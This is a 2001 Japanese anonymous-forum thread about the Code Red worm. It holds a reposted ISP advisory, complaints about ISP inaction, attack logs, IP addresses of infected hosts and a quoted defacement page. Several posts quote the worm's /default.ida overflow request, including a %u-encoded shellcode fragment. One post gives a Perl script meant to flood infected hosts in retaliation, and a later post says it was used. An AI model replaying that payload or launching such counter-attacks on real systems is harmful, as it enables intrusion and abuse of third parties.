どうでもいいからシマンテック、TrendMicroその他ウイルス対策会社はIISをウイルスとして扱え
455 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 14:30
>>451 ウチの会社はスーパー引いてるけど、ウチも昨日だったよ。メール
456 :
455 :2001/08/22(水) 14:32
以下全文 OCNサービスご利用のお客様へ 2001年8月21日 NTTコミュニケーションズ(株) OCNサービスセンタ 「Code Redワーム」にご注意下さい --------------------------------------------------------------- ・緊急かつ重要な案件のため、通常OCNからの電子メールによるご案内 を不要とされるお客様にも送信しております。 ・全てのお客様にお知らせしている都合上、本メールの内容について、 対策不要な環境でインターネットをご利用のお客様にもお送りして おります。お客様のご利用環境が対象なるかご確認下さい。 --------------------------------------------------------------- 日頃はOCNサービスをご利用いただきまして、誠にありがとうござい ます。 さて、既にマスコミの報道等によりご存知の方もいらっしゃるかと 思いますが、マイクロソフト社 Windows NT/2000 等のオペレーティン グシステム製品に感染する「Code Red」と呼ばれるワーム型コンピュー タウィルスとその変種が世界中で猛威を振るっており、OCN でも多くの お客様ににその被害が広まっています。 マイクロソフト社のInternet Information Services(以下、IIS)及び Index Server/Serviceを搭載するWindowsNT/2000等のオペレーティング システム製品は、IISを実際にご利用になっていない場合でもCode Red に感染する可能性があります。 感染すると他のIISサーバを攻撃すると共に、自分自身にはインター ネットから不正侵入することができるバックドア(ハッカーがしのびこ むための裏口)をサーバに仕掛けるため、早急な対策を強くお勧めしま す。 具体的な対策はマイクロソフト社等のホームページをご覧下さい。
457 :
455 :2001/08/22(水) 14:33
つづき
===============================================================
Code Red による深刻な問題に対する防護策と対処方法についての説明
---------------------------------------------------------------
http://www.microsoft.com/japan/technet/security/codeptch.asp ※このホームページにはWindows NT 4.0/Small Business Server 4.5
Windows 2000/Small Business Server 2000の具体的な対策方法が
紹介されています。
===============================================================
Windows 2000 Professional 用 Code Red ワーム対策ガイド
---------------------------------------------------------------
http://www.microsoft.com/japan/technet/security/codestep.asp ※このホームページにはWindows 2000 Professionalの具体的な対策方
法が紹介されています。
===============================================================
Code Red II ワームの既知の影響を排除するツール
---------------------------------------------------------------
http://www.microsoft.com/japan/technet/security/redfix.asp ※このホームページにはCode Red IIが仕掛けるバックドアの修復ツー
ルが紹介されています。最近はCode Red IIの感染報告が増加してい
ますので、是非確認されることを強くお勧めします。
上記ホームページの内容をご確認頂いた後、内容にご不明な点があ
れば下記マイクロソフト社様専用窓口にお問い合わせ下さい。
・マイクロソフト IIS セキュリティ情報センター
TEL:0120-69-0196
営業時間:9:00〜21:00まで有人対応(平日、土日祝日)
21:00〜翌9:00まで自動応答
===============================================================
Code Red チェックツール
---------------------------------------------------------------
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3057 ※このホームページにはCode Redが利用するセキュリティホールの
有無を確認できるツールが紹介されています。
また、OCNホームページ「サポートからのお知らせ」にはCode Red に
よって影響を受けるダイヤルアップルータ等の情報も記載しております
のでご参考になさって下さい。
Code Red ワームに関する情報
http://www.ocn.ne.jp/announce/2001/0803.html ※既に対処済みの場合には、入れ違いのご連絡となりましたことをお詫
び申し上げます。
なお、本件に関してましてご不明な点がございましたら、下記の窓口
までお問い合わせ下さい。
458 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 15:44
459 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 16:19
>>458 ガンバって将来のユーザーを増やしてるんだろ?
460 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 16:28
IISで単純に長いURLをRejectするモジュールが出たみたいね。
462 :
455 :2001/08/22(水) 20:18
>>461 ダイアルアップでも感染するからね。
問題なのは「エコノミー」以上の専用線ユーザ(ほとんどサーバ立ててると思われる)
への通知が今ごろだったって事。
OCNはサーバ用OSにNT推奨してるんだよね。
なのにIISのセキュリティホールの勧告なんて、今まで一回も無かった。
こういう情報は、専用線接続の全ユーザにきっちり流すべきだと思う。
>>445 今さらって思ってはいるよ。
いろいろあるんだよO○N内でもさ
7月の後半に注意喚起しようとしても
GOサインが出なかったんだよ。
464 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 20:28
>>463 あのセキュリティホールって6月だったような・・・
465 :
名無しさん@お腹いっぱい。 :2001/08/22(水) 20:34
そろそろ、サポートセンターの方々の愚痴が聞きたいナ
>>464 MSのネタではね。
実際に感染を確認したのは7/19,20だけど、絶対数が足りなかった。
実際に何か大規模に起きないと動かない人達なので、事が発生して
それなりの申告(内外の)があって初めて検討するからね。
権限あるところに、判る人がいないのが今回の時期はずれメールの原因
あと、Webサーバに関しては客側に全責任がある。
サポートは一切しないはずです。パッケージ契約でなければ。
>>465 どのようなこと?
>>462 激しく同意。
私もあのメールが来たときには、やっと来たか・・・ってオモタYO。
現に専用線からのアタックも多かったし、ダイアルアップからもひっきりなしに
アタックがあったし・・・
最低でも専用線ユーザーには早い段階で通知して欲しいと思ふ。
かくいう私もダイアルアップで感染したし、赤虫も2ちゃんで初めて知った厨房。
(その後再インスト IIS未インスト+SP2+パッチで対策済み)
鬱だ市んでくる・・・
468 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 01:16
あんま早いのもちょっとね。 掲示板の情報パクって検証もせずに通知してんじゃねーだろーとか勘ぐっちまう
ばかたれども。 なんでプロバが馬鹿ユーザが立てた鯖の心配しなきゃいかんのだ。 NT推奨だと?お前らにUNIX推奨しても使いこなせねえで変な質問ばっか よこすからしかたなくNTにしとけって意味なんだよ。けっ。 なんか勘違いしてんじゃねえか?
470 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 01:57
>>469 >なんでプロバが馬鹿ユーザが立てた鯖の心配しなきゃいかんのだ。
東京めたりっくみたいになるからだろ?
471 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 02:01
>>469 >NT推奨だと?お前らにUNIX推奨しても使いこなせねえで変な質問ばっか
>よこすからしかたなくNTにしとけって意味なんだよ。けっ。
だから、UNIXも扱えんアホばかりだからIISのセキュリティホールの勧告を出しとけってことでしょ
拡張子が.aspってマカフィってIIS使ってるんすかね? 別に何使おうが勝手なんですけどね セキュリティを扱う会社にしては珍しいんじゃないかなーっと
473 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 02:25
え?.aspって全部IISなの? 知らんかったわ。
なんかトップページ以外はほぼ全部asp。 経営母体のネットワークアソシエイツも同じ構成みたい。
475 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 02:46
http://www.nai.com/ ここのwebサーバーのレスポンスメッセージのヘッダー
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 22 Aug 2001 17:42:59 GMT
Connection: Keep-Alive
Content-Length: 38183
Content-Type: text/html
Cache-control: private
やっぱりIISだね
476 :
んー :2001/08/23(木) 04:32
厨房には解らんかもしれんが、 コスト削減が主流の、現代の企業にとって セキュリティに問題があっても NTは、必要なのだよ。 Sunは、ハード&サポートの面で、きついのだよ。
コスト削減の為にNT?
478 :
:2001/08/23(木) 06:47
ちなみに、Linux、FreeBSDは、サポートが駄目駄目なので 基本的には、却下だな。 やっぱ、サポート料払って、責任丸投げできなきゃ 使わん。
479 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 07:44
逆に今回みたいにセキュリティに問題があったため損害を被ったときのコストは計算に入れてないのね。 しかもwebサーバーの6割がサポートなしのapacheを使ってる。サポートがなきゃダメなんじゃないの?
480 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 08:32
>>479 被害があっても、金銭的に莫大な被害が無いかぎり問題ないのじゃよー。
信用を失う事も3万件の顧客情報が漏れてもへっちゃらな日本にはさほど問題じゃないのじゃよー。
被害者面でおきらくごくらくーぅ。
481 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 08:57
482 :
某ISP :2001/08/23(木) 10:29
483 :
>479 :2001/08/23(木) 11:24
Apacheが、Solaris上で動いてれば Sunのサーバーの保守の範囲に含まれるのだよ。 厳密に言えば、Apacheのアップグレードとかに 対するメンテナンス費用ってのは、ないかもしれんが。
484 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 20:22
>対するメンテナンス費用ってのは、ないかもしれんが。 じゃぁサポートしてないじゃん
485 :
名無しさん@お腹いっぱい。 :2001/08/23(木) 20:26
昨日の朝から変種が来てますなあ。 先頭あたりの「CodeRedII」→「_________」 あと送信先IPが少し違う。
いいなあ、ウチにはまだ来ないよ。 はやくこないかなあ。
487 :
ゴルァ! :2001/08/23(木) 20:57
>>466 >あと、Webサーバに関しては客側に全責任がある。
>サポートは一切しないはずです。パッケージ契約でなければ。
感染した奴にそう言ってしかるべきだが、野放しになっているアホユーザからいっぱい
要らんパケット貰って迷惑してる他ユーザとしては、ユーザ同士でかってにやれとい
わんばかりに知らん顔決め込まれたのは相当に不信に思ったのだった。
ユーザですら努力しているのだから、正直、プロバイダ同士で協力しあって安全で使い
やすいインフラにする努力はしてほしいところ。
490 :
名無しさん@お腹いっぱい。 :2001/08/24(金) 00:48
やぷーが感染してるかにゃ〜?(w
>>489 おっしゃることは分かりますが、代価を頂いてはじめて
サポート対象となることはご理解頂きたいです。
申告をいただければ、対象者に連絡はしていますが
踏み込んだ対応(利用停止等)を行っていないのも事実です。
→CodeRedに関しては
CodeRedの場合、規制すればWebの閲覧不可になるわけだし、
送受信されるパケットを許可無しに閲覧、規制することは
法律に触れますので...
「プロバイダ同士で協力しあって」は正直難しいです。
しかし「使いやすいインフラにする努力」は当然思慮すべきことですね。
急にサポセン口調になったな
業務上の社会的義務とかいったものもあるはずだよね。 廃液垂れ流しの工場なんかは規制されてしかるべしだし。
494 :
名無しさん@お腹いっぱい。 :2001/08/24(金) 07:22
>>480 なるほど
信用落として売上げ落としてもお気楽なのね
技術盗まれてライバルに抜かれて無駄な開発費かけてもお気楽なのね
被害があっても金銭的に多少の被害ならお気楽なのね
被害者面して訴えられて裁判費用かかってもお気楽なのね
金かかってんじゃねーかよ。
コスト削減の意味ねー
>>491 ワームを垂れ流しているサーバーの通信を制限しても法律に触れるのか?
制限しない方がまずそうだけど。
>>476 これだけセキュリティーで問題が出ても、ちゃんと管理出来てると言えるの?
サポート費用だけ取られていない?
>>491 わたしのレスも型どおりっぽいのですが、ユーザの立場として思うのはこういうこと。
べつにここでサポートしてくれとか言うわけではないけど、プロバはほんとになんに
もできないのか、考えて欲しい。
当然、素人考えで勝手な部分もあるから割り引いて読んで(藁
・ユーザが対価として期待している通信の質・安全性が保たれているだろうか。
現状ではVPNサービスのように閉じた網サービスを除いては、安全さ、防疫といった
部分は必ずしも契約に含まれていないのは確か。
ただし安心を差別化要素とか、プロバ自身の信用の要素として捉えているのかどう
だろうか企業姿勢というか、業界全体の姿勢が、逃げているように感じられてしまう。
某コイズミではないが、改善改革に頭を使っているかどうかユーザには見えてこない
ように思う。
技術者でもないフツーの人がユーザになっている今では、セキュリティの問題、ユー
ザが許容・対処できるもの(アカウント管理)もあるが、防疫対策は素人の対処できる
範囲を越えてきた気がする。メールについてはプロバが防疫サービスを行うようになっ
てきた。お金はかかるが技術的な負担も軽くて対価に見合うと思っている。
・法律、業界の協力の問題
プロバイダに権限と同時に義務を持たせるように法律を変えるか、品質に対して業界
で自己評価基準でも設けてはいかがと思う。当然それは個々のプロバイダでは無理
で業界として取り組まないと。技術も運用も理解しない政治家がとんちんかんな法律
をつくりかねない。ユーザやプロバイダが主導で法律を起こしたほうがユーザとしては
受け入れやすい。
当然、法律等の整備がなされていない段階で今回のCodeRedにすぐ対処しろという
ことを主張したいわけではなくて、毎回、嵐が去るのを首をちぢこめて待っているだ
けのように見えるのが残念。いやそんなことはないというのを、今見せろといわないけど
いつか見せて欲しい。
ところで、
>> CodeRedの場合、規制すればWebの閲覧不可になるわけだし、
あきらかにユーザとしての契約上の義務に違反していて、警告して一定期間内に対処
されなければ、ぶったぎられて当然と思いますが、そんなに難しいのでしょうか。
単に、手間ヒマや逆切れユーザの対処がプロバに対して負担だから言い訳になって
しまっているように感じます。実態は法律よりコストや体制・パワーの問題ではないで
すか?
たとえば、マンションの管理者は、もちろん法律で許可された範囲の手段ながら、迷惑
な住人から近隣住民の利益を守る義務を負っていますし、実際にたいていの管理者は
注意くらいはしてるわけですよね。
>CodeRedの場合、規制すればWebの閲覧不可になるわけだし、 馬鹿? それともOCNには上りと下りを別々に規制できる技術者も いないのか? >送受信されるパケットを許可無しに閲覧、規制することは >法律に触れますので... 東めたはポート80閉じましたが何か?
>>494 クラックされたからって信用が落ちて売り上げ落ちた所なんてあるぅ?
クラックされて情報漏洩で裁判費用でヒィヒィなんて所あるのぉ?
ないよねー。ないよー。
ぜんぜん、問題ないよー。
ニッポンジンイイヒトバカリ。ボクスキ、ボクスキ、ニッポンダイスキ。
500 :
名無しさん@お腹いっぱい。 :2001/08/24(金) 17:55
500
501 :
名無しさん@お腹いっぱい。 :2001/08/24(金) 20:12
>>499 クラックされるような会社にクレジット番号は送信したくないな。
502 :
名無しさん@お腹いっぱい。 :2001/08/24(金) 20:39
>>499 とりあえずバックドア仕掛けられまくってる韓国とは取り引きしたくないな
503 :
名無しさん@お腹いっぱい。 :2001/08/24(金) 21:51
>>497 逃げの姿勢ですか、確かに収益性の無いものからは避けますよね。
でもこれから安全や安心もISPのサービスの一環となるでしょうから
企業努力の見せ所ですね。
「ぶったぎられて当然」は個人的にはそう思います。
SPAM等に関しては時間がかかりましたが規約改正等で厳しい
対応が可能となりましたが、CodeRedのように流行りものの
ようなものには対応しきれていないのが現実です。
約款や規約改正は簡単には行えないのです。
(言っていて情けないが)
>実態は法律よりコストや体制・パワーの問題ではないですか?
その通りです(苦笑)詳しくはコメントできませんが...
>>498 私個人はヴァカですが、周りの人達はそうではないですよ。
技術的には当然可能ですが、現行の規約ではCodeRedで
利用停止にはできませんので、仮に特定のポート止める
にしてもフィルタ設定と対応パターンを全ての設備に
導入するのは、コスト面と人的面で不可能だし...
その点、東めたさんはすごいと思いますよ。
止めちゃったんだから...
うちの設備がユーザから出るCodeRedパケットで
パンクするようなら止めちゃったかもしれませんけどね。
ttp://www.meti.go.jp/meti_hou/body/00000229.html そろそろヤバソなので自粛します。
505 :
名無しさん@お腹いっぱい。 :2001/08/24(金) 22:29
また変種が来てるようですな。 ご丁寧に裏口が塞がれてる模様。 MSが流したのかな?w
506 :
怖くなった :2001/08/25(土) 00:17
1週間前にメールで警告したサイトの管理者より、携帯へ御礼の伝言が入っていた。 おらぁ番号知らせた覚えは無いぞ。有る意味ゾッとした。気持ち悪いんで関わりたくない、ほっておこう。
それはすごいな、どうやって調べたんだろう。 つーか、会社にTELで問い合わせしたのかも。
508 :
名無しさん@お腹いっぱい。 :2001/08/25(土) 04:03
>>499 あのぉサポート料って「裁判費用でヒィヒィ」ってほど高くないと思いますよ
509 :
名無しさん@お腹いっぱい。 :2001/08/25(土) 17:34
↑って上の方ででてるcoderedIIの部分を_____にしてある奴の 事だね。ログからじゃ判別できないな。
>>509 永遠に続くかもしれないだって。
イヤになっちゃうねぇ。
512 :
名無しさん@お腹いっぱい。 :2001/08/26 08:43
>509 この変種って、同じところから何度もアタックしてるやつだと思って いいんでしょうか?、、 とすると、前のはIPの近い所からが多かったですけど、今度のは、 202.160.29.180から24回 24.178.213.75から39回 213.93.157.39から80回 212.114.170.252から78回 66.90.139.148から51回 202.65.200.43から42回 って感じで世界各地からの攻撃ですよね?、、 これだと以前の奴よりトラフィックに与えるダメージ大きくないですか?、、 誰かやるかもって思ってたけど、、はぁ、、
>509 9月末までのタイマーは外されたのだろうか?
>>513 どうなんだろ。ディスアセ見るとたぶん2バイト書き換えただけで無効にできるけど。
今日、Apache入れていろいろ設定して127.0.0.1で接続確認。 で、ちゃんとログとれてるか確認してみたら… 第一アクセスが、"GET /default.ida?XXXXXXXXXXXXX・・・ 鬱。
なんちゃってIISユーザーの次は、 なんちゃってApacheユーザーの増加ですか・・・ クラックされんなヨ
517 :
erer :01/08/27 22:23 ID:w8fjr5p2
test
518 :
名無しさん@お腹いっぱい。 :01/08/27 22:42 ID:fiQ7.woQ
interqが多い。。。。 "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXX インターq経由
519 :
名無しさん@お腹いっぱい。 :01/08/28 00:23 ID:FWrmUw3Y
520 :
名無しさん@お腹いっぱい。 :01/08/28 00:29 ID:RMa3gYJM
マ小手先のイクロソフト逝ってよし。
521 :
名無しさん@お腹いっぱい。 :01/08/28 09:52 ID:1g05Vkzg
うん、とっても既出。
523 :
名無しさん@お腹いっぱい。 :01/08/28 14:58 ID:aX.UQXNA
明日からコードレッドは休みに入ります。 新学期からまた復活するが(W
525 :
test :01/08/28 17:36 ID:5Ko4uT/A
それ、上の方でも紹介されてたような気がするけど、 日付チェックの部分には触れられてないよね。 なんか、事実誤認なのかな。
527 :
名無しさん@お腹いっぱい。 :01/08/28 22:25 ID:BtAsF0xc
CodeRedProveがバージョンアップしてたよ。 CodeRed.dも検知出来るようになったみたい。 うーん、.dの方も結構来るね・・・
528 :
名無しさん@お腹いっぱい。 :01/08/28 23:59 ID:TGozUppA
>>523 それはCODE RED 1のことだよ
>>526 525はCODE RED 3のことだよ。CODE RED 2じゃないよ
529 :
名無しさん@お腹いっぱい。 :01/08/29 00:46 ID:k9FutbP2
XPはデフォルトでPFWついてるらしいが、IIS立ててても感染しないのかな?
530 :
名無しさん@お腹いっぱい。 :01/08/29 03:02 ID:5NCTEWBg
>>528 いや、だから、そのcode red3だかcodered.dだかは日付チェックが
はずしてあるのかな?というのが疑問なんだがなあ。
>>531 以前も突然最後が振り切ったことがあるけど、横軸が長くなると右端がバグっている
ように思われる。前回は1〜2日たったら治ったけど。
533 :
名無しさん@お腹いっぱい。 :01/08/29 14:32 ID:zSlES5xk
>>533 よくわからんな・・
planexのBRL-01はNATルータだろ。
Code RedはWindows用のコード。
それが感染するのならBRL-01はWindowsで動いてることになるが、
そんな高くて信頼性の低い仕様を採用することはあり得ないぞ(w
535 :
被害報告 :01/08/29 19:27 ID:9Fs6gf7c
10〜20分に1回アタック食らうんだけど、これって正常?
536 :
名無しさん@お腹いっぱい。 :01/08/29 19:31 ID:FfdqxhyU
>>534 客先にBRL-01が有りました。CodeRedで逝きました。
現象としては、WAN側のDHCPが無効になって固定IPになったりNATが無効になったりと、
パラメータがめちゃくちゃになります。
おそらくは、バッファオーバーランでパラメータ管理領域を上書きしてしまっているのだと思われ。
当然、CodeRedのコードが走るわけではありませぬ。
>>536 それならわかるぞ。
Code Redで障害を起こすルータにBRL-01が加わっただけのこと。
>*現在CodeRedに感染されているユーザには個別にご連絡しております。
> 弊社よりご連絡のない方でも今後感染し、上記ルータがCodeRedの
> 発信元となる恐れがあります。
> CodeRed対策をされるまでは利用されないようお願いいたします。
つーicnetの情報は間違いだ。
539 :
ななし :01/08/29 21:30 ID:rPf/LY52
IISは使ってないんですけど /default.idaを作って遊べないんですか?
540 :
名無しさん@お腹いっぱい。 :01/08/30 02:07 ID:dVQuQv0.
541 :
なんだこれ? :01/08/30 07:30 ID:yNozpN4A
542 :
TEST :01/08/30 12:44 ID:RJYzaYaw
>>541 sadmind. sadmindにやられているマシンってCodeRedにも
やられてるね。
543 :
名無しさん@お腹いっぱい。 :01/08/30 13:26 ID:RwQIWvuM
戚 凪戚走研 達聖 呪 蒸柔艦陥. 達壱 赤澗 凪戚走亜 肢薦鞠醸暗蟹 戚硯戚 痕井鞠醸暗蟹 析獣旋生稽 紫遂拝 呪 蒸柔艦陥. -------------------------------------------------------------------------------- 陥製聖 獣亀背 左淑獣神. 爽社 妊獣匝拭 凪戚走 爽社研 脊径梅陥檎 爽社研 舛溌備 脊径梅澗走 溌昔背 左淑獣神. 210.108.138.125 幡 凪戚走研 尻 陥製 据馬澗 舛左拭 企廃 元滴研 達生淑獣神. 及稽 舘蓄研 適遣馬食 陥献 元滴研 獣亀背 左淑獣神. HTTP 404 - 督析聖 達聖 呪 蒸製 Internet Information Services -------------------------------------------------------------------------------- 奄綬 舛左(走据 昔径遂) 切室廃 舛左: Microsoft 奄綬 走据
544 :
541 :01/08/30 14:04 ID:Mlpm7..2
>>542 sadmind だったのね、初めて見た(^^;教えてくれてありがとェ(_ _)ェ
昨日から、アタックされてたから、何だろうと思って・・・
>>543 HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location:
http://210.108.138.125/Default.htm Date: Thu, 30 Aug 2001 05:02:19 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 24 Jul 2001 20:19:22 GMT
ETag: "01d6ec7d14c11:2020"
Content-Length: 289
<html><body bgcolor=black><br><br><br><br><br><br><table width=100%>
<td><p align="center"><font size=7 color=red>fuck USA Government</font>
<tr><td><p align="center"><font size=7 color=red>fuck PoizonBOx
<tr><td><p align="center"><font size=4 color=red>contact:
[email protected] </html>
未だにこれなんだけど、見れない?
>>541 ノートン騒いでコンテンツロック掛かったゾ。そこ。
ワラタけど
546 :
541 :01/08/30 15:53 ID:6z/N.MiA
>>545 えっ!、そうなの?、なんか変なところを書き込んだようで ェ(_ _)ェ
ノートン持ってないんで、確認できないけど、
アクセスログも、ソースも、怪しいところがないし
なんでだろ?。
ソースはオレも見たけど変なの無し。 直後からヤフページャ落ちたりエクセル表示変になったりだったけど、 原因解らず。 因果関係が解らなくて今一すっきりしない。欲求不まーん(w
548 :
541 :01/08/30 20:38 ID:.BsSBLZk
>>547 ん〜、ゴメンねー、俺がいかがわしいアドレス書いたが為に(^^;
パケットレベルで見ればなんか解るかもしれないけど・・・
Win2kの穴塞いで、糞ルーター取っ払ってネットに直つなぎする
元気ないですェ(_ _)ェ
しかし、CodeRed からのアクセスは気分が悪い・・・
うちのノートン君静かだったYO! ソースみたけどスクリプト入ってないし。 HTML書き換えられただけとおもわれ。
550 :
549 :01/08/30 23:35 ID:hS5hCpys
追加 うちのノートン君はNIS2001の最新版だよー
会社で
>>541 見たら、NAV コーポレートエディション君のスキャンが入って
「Backdoor.Sadmindが見つかったけど検疫で止めたから安心したまえ」的な
コメントが出た。
その後は何もトラブルは起きてないよ。
552 :
名無しさん@お腹いっぱい。 :01/08/31 16:58 ID:ff3FJU46
sadmindにやられたページ見ても危険があるとは思えないから、 騒ぐソフトの方が変なのではないかなあとか思う。
553 :
え〜ん :01/08/31 22:08 ID:ezb9W/X6
今日はオークションとタイタニックかよ。 ところでcodered dってガセではないの? サイトにリンクしていいのかどうなのか? 仕事が忙しくて調べる暇が無いスマソsage
どうせこて班だからキャップテスト よごしてすまそ
おはよ 新宿爆破実況で飛ばなかったのね もしかして2ちゃんは存続決定? またよごしちゃった 最近忙しすぎて2ちゃんより先に俺の頭飛びそう。
556 :
名無しさん@お腹いっぱい。 :01/09/01 10:36 ID:1YOPMGAs
pc198.hellobox.co.jp こいつどうにかならんかな。しつこい上に教えてやりようがない。
557 :
名無しさん :01/09/01 11:08 ID:fVawew5Q
Name: pc198.hellobox.co.jp Address: 211.120.14.198
株式会社ブルーバードオンライン (Bluebird Soft Inc)
BLUEBIRD-NET [211.120.14.192 <-> 211.120.14.255] 211.120.14.192/26
http://www.bluebird.ne.jp/ ここじゃないかな。
558 :
名無しさん@お腹いっぱい。 :01/09/01 17:14 ID:1YOPMGAs
おお、ありがとう。早速メールしてみる。
え〜ん
え〜ん
562 :
え〜ん :01/09/01 20:13 ID:JQN2L5.o
>>561 IDおれにぴったりじゃん( ̄ー ̄)ニヤリッ
563 :
え〜ん :01/09/01 20:26 ID:JQN2L5.o
565 :
名無しさん@お腹いっぱい。 :01/09/01 22:44 ID:1YOPMGAs
どうしてこうzaqはバカばかりなんだ。 zaqd378bbcd.zaq.ne.jp
566 :
名無しさん@お腹いっぱい。 :01/09/01 22:51 ID:P1bytEMk
>565 ほんとまいるよな。っていうか、俺もザクだけど。 でも、ザクなんかよりこちとら大学の方がヤバイよ。 20台以上ヤラレテルっぽいのな…鬱
567 :
名無しさん@お腹いっぱい。 :01/09/01 22:56 ID:q.4n2.PY
evd20010828-15.enc 種類: ENC ファイル 場所: C:\Program Files\Network ICE\BlackICE サイズ: 1.55 KB 検疫: 2001年9月1日 22:23:16 未提出検疫 ノートンでレポートしたらコードレットワームに ブラックアイスが感染していた こんな事ってあるの?
それはノートンのイヤガラセだよ。
よかったらPassゆずってくれでち・・
570 :
名無しさん@お腹いっぱい。 :01/09/01 23:49 ID:1YOPMGAs
当然プロバイダの方へもCodeRedは行っているだろうから、せめて自分の会員の 感染くらいは教えてやれぱいいのにな。 いまだに最低1分に一発はやって来るよ。
571 :
名無しさん@お腹いっぱい。 :01/09/02 00:05 ID:Mgwg09DE
>>567 encは、侵入者のデータを記録してるファイル。
CodeRedのコードも記録されてるから、それに反応したんでそ。
572 :
名無しさん@お腹いっぱい。 :01/09/02 00:16 ID:zdFPVZjA
>>571 さん
有難う〜。
MEなのに何でなんだろうと思ってたから
(もしかしてこれも新種っ)て不安でした。
少し安心出来ました。
573 :
俺も、え〜ん氏に捧ぐ :01/09/02 00:26 ID:UC6k9mJI
574 :
名無しさん@お腹いっぱい。 :01/09/02 02:46 ID:DJy/zDU6
575 :
名無しさん@お腹いっぱい。 :01/09/02 06:51 ID:DJy/zDU6
>>573 ありがとう、ありがたく頂戴いたします。
うまく出るかな
>>578 CodeRed感染サーバの動作が巨大ファイルのダウンロードで遅くなる程度の副作用とか・・・
580 :
名無しさん@お腹いっぱい。 :01/09/02 16:39 ID:WOGYiVm.
こんなのをダミーの鯖に設置しようと思うんですが、ダメでしょうか。 ↓ <default.ida> #!/usr/bin/perl print "Content-type: text/plain\r\n\r\n"; for(;;){ print "A"; }
581 :
名無しさん@お腹いっぱい。 :01/09/02 18:01 ID:DJy/zDU6
>>580 うーん、自分の回線の帯域を使うのはもったいない
582 :
名無しさん@お腹いっぱい。 :01/09/02 18:05 ID:DJy/zDU6
>>579 帯域が使われると遅くなるので、、相手の管理者も気づくんではないかと。
妙に遅いとか、何もしてないのにアクセスランプがついている、とかで。
583 :
ななし :01/09/02 18:52 ID:PEvg3Hj.
584 :
名無しさん@お腹いっぱい。 :01/09/02 19:29 ID:DJy/zDU6
>>583 延々と「AAAAAAAAAAA…」を受け取り続けるという事に…
>>579 ,582
根本的に勘違いしていると思われ。
586 :
579 :01/09/02 22:13 ID:7NEjOgSI
>>585 カキコ直後に気がついたよ(恥 相手はブラウザじゃないし、レスポンスも受信
しないだろうしね。
587 :
580 :01/09/02 22:58 ID:WOGYiVm.
やってみました。(コラ んー、なんかイマイチって言いますか。。 そのあと2回もおなじIPからアクセスあったようなんですよね。 やっぱり、意味無いんですかね、、
588 :
名無しさん@お腹いっぱい。 :01/09/02 23:39 ID:DJy/zDU6
>>585 受信しないのかな?
するとオーバーフローで穴開けたあと、どういう手順で感染させるんだろう?
589 :
名無しさん@お腹いっぱい。 :01/09/02 23:40 ID:DJy/zDU6
何かこう、ええ方法はないんですかなあ
590 :
名無しさん@お腹いっぱい。 :01/09/03 01:51 ID:vgLCYeqs
>>580 それは実際に某社で使用されたクラッシャーじゃないですか。
591 :
名無しさん@お腹いっぱい :01/09/03 02:02 ID:7Bw0WgZQ
台湾からのコードレッドアクセスが多いのは 気のせいだろうか
592 :
:01/09/03 03:27 ID:YEBUuhG6
うちでは韓国からが多いですな。あと大陸。
>>588 オーバーフローした段階で、すでに感染してます。
594 :
:01/09/03 03:50 ID:YEBUuhG6
>>587 1.中国語の場合は、自己流布のためのスレッドを600個作成し、これがそれぞれ48時間、自己流布のために攻撃パケットを送信しつづける。中国語以外の場合は、自己流布のためのスレッドを300個作成し、これがそれぞれ24時間、自己流布のために攻撃パケットを送信しつづける
2.生成したIPアドレスへの攻撃に当たっては、非ブロッキングモードで接続を試みる。この場合、接続の完了を待たずに次の攻撃に移れるため、結果として、攻撃頻度が高くなる。
3.この攻撃によって他ホストへの接続に成功すると、自身のコピーを送りつける。現時点では自己改変機能はないため、Code Red IIはすべて同じ内容である。なお、このコピーは約3.5KBある。
という事なので、次々と同IPからアタックして来たとしても不思議ではないです。
3番目の処理をどのようにして判定しているのかがわかれば何か手が見つかるかも
知れないですが。
595 :
名無し :01/09/03 03:50 ID:B/J7A8oc
9/1 ADSLを導入してルーターモデムTE4100に変えてから CodeRedが全くこなくなった。不思議だ。 TE4100が阻止しているとは思えない。
596 :
:01/09/03 03:51 ID:YEBUuhG6
597 :
:01/09/03 03:53 ID:YEBUuhG6
>>595 以前とはIPが変わってはないですか?
第一オクテットが61, 201, 210, 211に被害が集中しているそうですが。
>>596 ちがう。コピーを送りつけるのは、さらに次の犠牲者への感染。
599 :
:01/09/03 04:01 ID:YEBUuhG6
>>598 重要なのはXの羅列の後ろに続くバイナリ部分ですが、これによって穴を開け、続いて
本体を流し込むのでは?
以下だけで完結するとは思えないんですが。
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
601 :
598 :01/09/03 04:05 ID:gVfi7BBo
>>599 600読んでもらったら判ると思うけど、
結局、本体を流し込まれたら、バッファを処理していた(正式の)関数の処理が終わり、
呼び出し元の関数に戻ろうとする時点で流し込まれたコードに誘導され、乗っ取られるの。
#CodeRedが特殊ではなくて「バッファオーバフローによる制御奪取」の定義ともいえる。
ちょっと説明の要領がわるくてスマソ。
602 :
:01/09/03 04:14 ID:YEBUuhG6
>>601 読んできました。オーバーフローの要領はわかりましたが、そうするとCodeRedは
